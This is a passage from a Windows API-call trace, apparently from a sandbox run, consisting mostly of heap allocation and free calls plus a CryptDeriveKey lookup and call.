lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0268.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0268.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0268.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14f50 | out: hHeap=0x970000) returned 1 [0268.228] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0268.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0268.229] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.229] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e08 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.230] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.230] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0268.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.231] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0268.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.231] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c88 [0268.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0268.231] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0268.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c88 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0268.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0268.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e51d00 [0268.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e51d00, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.236] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0268.236] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87690, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15a18 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.237] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 